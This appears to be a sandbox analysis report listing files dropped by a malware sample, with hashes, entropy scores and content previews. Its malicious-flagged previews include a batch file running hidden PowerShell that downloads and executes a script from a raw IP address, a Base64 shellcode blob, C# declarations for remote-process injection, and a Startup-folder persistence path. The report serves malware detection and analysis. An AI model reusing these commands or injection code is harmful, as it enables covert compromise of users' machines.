                                                                            Preview:{"serviceContext":{"serviceActivityId":"08828313-d30f-457d-9bde-ebf46128c74c","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"08828313-d30f-457d-9bde-ebf46128c74c|2025-03-06T07:10:57.1942125Z|fabric_msn|EUS2-A|News_408","tier":"\u0000","clientActivityId":"F382943E-8A19-46B8-82E2-2971F42A647D"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false,"uncloakAnimation":false},"isPartial":false}
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.34726597513537405
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlll:Nll
                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                            Malicious:false
                                                                            Preview:@...e...........................................................
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.1008963976150743
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grypjYak7YnqqSjNPN5Dlq5J:+RI+ycuZhNQakS8PNnqX
                                                                            MD5:74253D95424A094FC9258DA9BA89A74F
                                                                            SHA1:FFE8BB158462FA0673D8F55BB5A79A462C08C728
                                                                            SHA-256:61362E5390ACE6121E299C328EE4E917E2FCEBBEC191B6FE41BC89048DC0AFFF
                                                                            SHA-512:0EB22529F860C13443BB2AD5F35BB378A69E093EDF069FF55680B684E2FD0092E0654E3322E5D9A12BFB41C8315F3CC5A6613507061E5E4B03721502CDFC6DA6
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.k.a.x.w.g.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.k.a.x.w.g.f.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                            Process:C:\Users\user\Desktop\yjYJ8QncaF.exe
                                                                            File Type:ASCII text, with very long lines (304), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):334
                                                                            Entropy (8bit):5.334205760568907
                                                                            Encrypted:false
                                                                            SSDEEP:6:NS0SG80QO0c5I1R3KuYkeAILh8JJwgJBG0w5z4VOXL8UdMR+u1MFCsnfSTFUqO0J:NS5G80Qpc5I1kxAKG3wgJ80w588Xxdxe
                                                                            MD5:3895CB9413357F87A88C047AE0D0BD40
                                                                            SHA1:227404DD0F7D7D3EA9601EECD705EFFE052A6C91
                                                                            SHA-256:8140DF06EBCDA4D8B85BB00C3C0910EFC14B75E53E7A1E4F7B6FA515E4164785
                                                                            SHA-512:A886081127B4888279ABA9B86AA50A74D044489CF43819C1DEA793A410E39A62413CEB7866F387407327B348341B2FF03CBE2430C57628A5E5402447D3070CA1
                                                                            Malicious:true
                                                                            Preview:@shift /0..@echo off..powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile '%TEMP%\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"%TEMP%\installer.ps1\"' -WindowStyle Hidden}"..exit..
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Mar 6 08:29:39 2025, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1332
                                                                            Entropy (8bit):3.9960326090889637
                                                                            Encrypted:false
                                                                            SSDEEP:24:HDFzW98hfotDfHgwKEsmNwI+ycuZhNtakSLPNnqS2d:1GvKhmm1ulta3hqSG
                                                                            MD5:605AAFD47BB2A46B8701A6E0F675B396
                                                                            SHA1:80B5FD708B7E8EB5B1EB8E92DFB78A32D445E0EC
                                                                            SHA-256:452005A561540826DE85C9BCF925D98C99FF7D302E500E242CCF02AED1BB8CA1
                                                                            SHA-512:D703914377AE003759BBCB8787F34CAC15F09EF64395B2D119DAA2D1560B925234ABCA43B2A2E9EDD432D6FD91A9CA2B684BD8E4A5564AC3165AC206543C92EA
                                                                            Malicious:false
                                                                            Preview:L....\.g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........R....c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP...................-...).TW:..IY..........4.......C:\Users\user\AppData\Local\Temp\RES4748.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.5.a.x.k.i.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Thu Mar 6 08:30:29 2025, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1376
                                                                            Entropy (8bit):4.074587054061173
                                                                            Encrypted:false
                                                                            SSDEEP:24:HOO9DhfHWfHvwKMbmuVMONWI+ycuZhNQakS8PNnqSQEgd:TZHKYKMCu941ulQa3sqSZ0
                                                                            MD5:E5BFE79EB397A791D711C7DF694E29D9
                                                                            SHA1:0219CE6B3458E2BD95F4BD40B90368057560F932
                                                                            SHA-256:6930185BBD1D28758641467171893CBF9D0E22040427427CB5983FBFF75B52D2
                                                                            SHA-512:EE516EB5DD7FC0F4BBA73E49EBDF1B144A28725CA235D960362BEE4B70683A4176E0B104BD4774B6E86EEF045BAD427DF7D6C4AFB05E758E33F36F5D45A91836
                                                                            Malicious:false
                                                                            Preview:L...%].g.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........J....c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP.................t%=.BJ.O.%.....O..........3.......C:\Users\user\AppData\Local\Temp\RESC2E.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.k.a.x.w.g.f.0...d.l.l.....(.....L.e.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):11903058
                                                                            Entropy (8bit):6.001286550602484
                                                                            Encrypted:false
                                                                            SSDEEP:49152:ouEYV56Cuy/XQxTwsUcCnFapQCYTF7j1D2Srat2EO9MsskNirT2sh7Wv0yCLfcvh:r
                                                                            MD5:B6D611AF4BEA8EAAA639BBF024EB0E2D
                                                                            SHA1:0B1205546FD80407D85C9BFBED5FF69D00645744
                                                                            SHA-256:8CD3BF95CEDCF3469D0044976C66CBF22CD2FECF21AE4F94986D7211D6BA9A2B
                                                                            SHA-512:D8A4EC5BD986884959DB3EDFD48E2BF4C70EAD436F81EAB73B104AA0FF0F5DADFB6227CB2DAB1F979F0DBB3AAFBC1889ED571FB6E9444A09AE984B789314463D
                                                                            Malicious:true
                                                                            Preview:$Base64Shellcode = "6MD1hwDA9YcAMPEXpBBNkUDFfYRVQ3yvInI8M4ntArL8Wl9/MsdctFgAAAAA1kkIlrOpS+cPj2a2EVOQ05KNTYfQ4AZSALPZO0MFCDzNkh+QQPV7z+9gp/qtd66s8jhY0dN5HFsabYXl2lg1REifKK1HETr37UZTWesfJVAVfXlbEG1v5HpNvQ0JrANX7uoPeD6UvxsrKFTOLLOBcwmp+jMqSjOCc+Ffoy9S5upBheclDaAoW9B95yX35U/Od7YFyDOf45PGumgNadzuIdAiJ3VtcMM+pKc06MyHqDc0vw5WryQbnoDapNfe8vSW1hFDmnA0Ifbz2MozCzG4WVcNRBl1Zu8NNpUTMjHE6DqO8OhB8vbEmjR5j9iSw1JE0+VGDd3gbaPMMZ/2/BEvE7PSVB2Egc15AzGIRO1ycscdHgc53oIqCierNft0tge6jHxIznGqwS6tN1jIyGRlNS1DKsqwDkBdjUmIlWvEVSZHNQ2wTuzURXYPh5Oiqayot+XSITp+rMQgbjyufsBzFAgqAEZwt+rEUtZcvN8fvLNyUGn7npCzGEQyE9d1VKttlHE6r3I9qyvI50jaee64LDR2mOUVjn9b77vlNyOcoVGLPSFJWRdZ+UN9/0Na3Esn5vzzdTQPSVxbWVC7zVfyFVTwTZwo1vay4lZVBgs3jdG5lHobkzevh6+zYyf5luHi8mK+oBiSr/sv/N4sPO8PJCWvfCpIA2fh/Jv2SRW9754AAAAAAAAAAAEAAAADAAAAAAAAABkRvFSmEhLro5cn+JFulhQts0r6aEDUmLx8PvVGAEo4oH+0z/3YqZPt2EoeCJxNTnYYhpoznR2YcS19oj8NaFjXdIT/izGoglFFvN7LkUep2ocDSHaeyffSr83KrIWM0F+cBz5yQFNZI7ApliUsRw2Mr2gXmhg+dy/EHPEHzmS5q4YtRVNiBwpiEu1p0jPIAK0pNzzYp3vTBZhOwIQA
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):941
                                                                            Entropy (8bit):4.911556815123455
                                                                            Encrypted:false
                                                                            SSDEEP:24:JjmRMtfg4uI5mnFz7sV+HyfwztLqtsmPz9y:Jjjtfg4uI5IFz7sUHyfitmb7E
                                                                            MD5:1809FE3BA081F587330273428EC09C9C
                                                                            SHA1:D24EA2EA868AE49F46C8A7D894B7FDA255EC1CD9
                                                                            SHA-256:D07A0C5FDF0862325608791F92273E0FC411C294F94D757F1FF0303BA5E03457
                                                                            SHA-512:E662420FC93A5CEFD657F7701432924E6A06482EA147AD814D5E20B16B2F3C13ED2CC6B9CAF24C22B7A5B24AD0AA1D216C5804C46D2250522CFC2CADC69F9E28
                                                                            Malicious:true
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace Win32.{. public class Kernel32. {. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);.. }..}.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):351
                                                                            Entropy (8bit):5.259303947937374
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fSzxs7+AEszIwkn23fX:p37Lvkmb6KRfKWZEifv
                                                                            MD5:C47CDA9A9DE95A82F633782D888FD0AA
                                                                            SHA1:942FE9834AA91DE53A6183CFC18CE53827E4A53E
                                                                            SHA-256:578755C50880C978F9B17E132B65B5D16A5191681123F6F359247DEDC725DE9C
                                                                            SHA-512:3E8869E1EAC6C1BA0CFA64CF4945F84DAD7D607F443CD50D385781DEEA7EF382003CCE4FEE38CD3172842AB3D3D349F4C8F059E22C060AFF96C69E96F6315797
                                                                            Malicious:false
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkaxwgf0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tkaxwgf0.0.cs"
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3584
                                                                            Entropy (8bit):3.1937697605866555
                                                                            Encrypted:false
                                                                            SSDEEP:48:6RKMkdjUITNfiXsjom8guz7NcJ+72Q/1ulQa3sq6:kkdjVruKk
                                                                            MD5:7E17130868E44DD3503F9677F8A88842
                                                                            SHA1:18FAF9D7FD1EF0E96D14E6A915B9FCE69FDAAC7A
                                                                            SHA-256:22B2265CA88909D859A07DD67BCD8B54D3E73536BCFDFA05BD71BC6AA275B59A
                                                                            SHA-512:E32F4DBE20AF70769FCE1C249B061A5AA0A1D900934CF2FF742148FFC9E0A7B647B462038ACD423ADB31EE242EE33884259FFD263921464D9D3A3F51202B1D9A
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%].g...........!................~%... ...@....... ....................................@.................................$%..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`%......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..,... ...#Strings....L.......#US.T.......#GUID...d...h...#Blob...........G.........%3............................................................6./...7......................................... .............. =............ I............ X............ k.%...P ......~.0.........................................................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (484), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):905
                                                                            Entropy (8bit):5.305161197266265
                                                                            Encrypted:false
                                                                            SSDEEP:24:KJmuVMyId3ka6KRfrEifWKax5DqBVKVrdFAMBJTH:vuRkka6CrEuWK2DcVKdBJj
                                                                            MD5:8CDCA29A67B5058D12D8274DFC27A322
                                                                            SHA1:94DB8338893632F2AEFAAA667FCB51A48F5FA09C
                                                                            SHA-256:6F7EF80727192744C247CEF9C1851095CA8D7FBECC7F4D9E287A58108943A4E1
                                                                            SHA-512:8780356C8002F6CD96CA58536754E6A83863EB7DC12E8E8F6BD1C14F377C39796B1823627F58A7E7BC23F5BAC0452665DB7A312A5F73D47C8C43D9654E3F7FB1
                                                                            Malicious:false
                                                                            Preview:.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkaxwgf0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tkaxwgf0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.116280656576703
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/ak7YnqqLPN5Dlq5J:+RI+ycuZhNtakSLPNnqX
                                                                            MD5:029F2DA9DFCC29DB9054573AB2AF4959
                                                                            SHA1:07A8682C0BCE0BD4324E0CB63D5BBA3BF3A97ACB
                                                                            SHA-256:0947ED505A6D9CCC30F747C7154FD6F5DB1F1340CCB64DBE01A40502B3B85025
                                                                            SHA-512:00E11FF596C6BFCAD4FDFD64365C4AE2A14A28CC36895D2E2E73FC05727E319DEF4418EAA07A0F1D5A82D99CABE05C7AC9A7C0C9C1A1ED41828EDCA50FB10CBC
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.5.a.x.k.i.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.h.5.a.x.k.i.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):941
                                                                            Entropy (8bit):4.911556815123455
                                                                            Encrypted:false
                                                                            SSDEEP:24:JjmRMtfg4uI5mnFz7sV+HyfwztLqtsmPz9y:Jjjtfg4uI5IFz7sUHyfitmb7E
                                                                            MD5:1809FE3BA081F587330273428EC09C9C
                                                                            SHA1:D24EA2EA868AE49F46C8A7D894B7FDA255EC1CD9
                                                                            SHA-256:D07A0C5FDF0862325608791F92273E0FC411C294F94D757F1FF0303BA5E03457
                                                                            SHA-512:E662420FC93A5CEFD657F7701432924E6A06482EA147AD814D5E20B16B2F3C13ED2CC6B9CAF24C22B7A5B24AD0AA1D216C5804C46D2250522CFC2CADC69F9E28
                                                                            Malicious:false
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace Win32.{. public class Kernel32. {. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);.. }..}.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):369
                                                                            Entropy (8bit):5.308231512448549
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fxG5fNGqzxs7+AEszIwkn23fxG5fNGP:p37Lvkmb6KRfpG5lGqWZEifpG5lGh9
                                                                            MD5:5B0517004490494D2AB3C32C4ED2F7E2
                                                                            SHA1:74336F0E4FDA0221FD0E3FDE1866BE1745FF4A4A
                                                                            SHA-256:8DDB6A55CA6B9577AB3D7ACE2F3F3128ED526C32BD924CC29113894F9C52CC0B
                                                                            SHA-512:3305A7E8149D4382B3B4B420B7DB9428BEE82B5F5101D26C0F924FFE5904AE8B1547C656FEA2C87E99A8628338D928DEEDEA436A45A4FB731D5E80F36815D219
                                                                            Malicious:true
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.0.cs"
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3584
                                                                            Entropy (8bit):3.1945168066925542
                                                                            Encrypted:false
                                                                            SSDEEP:48:6+KMkdjUITNfiXsjbm8guz7NcJJ7C/1ulta3hq6:3kdjVsvKb
                                                                            MD5:9BBC4579F21EB6AE3930E5AB9B312A91
                                                                            SHA1:C97554466BF5E7743CF3EADC953EEB49041751CC
                                                                            SHA-256:EC92F5824C7E693E9B461A484BC040F02A4930B88DBB52D360EEB3D9D518E67C
                                                                            SHA-512:A63F54BD31740F9330D56C43E73C1EEF2AC427FD4E1B250279F4E11F9C1BEAE87458634671CBB918E8C7F3F076A3F38C9A4F7C076A236A5D0DFCCBE917B43698
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.g...........!................~%... ...@....... ....................................@.................................$%..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`%......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..,... ...#Strings....L.......#US.T.......#GUID...d...h...#Blob...........G.........%3............................................................6./...7......................................... .............. =............ I............ X............ k.%...P ......~.0.........................................................................................
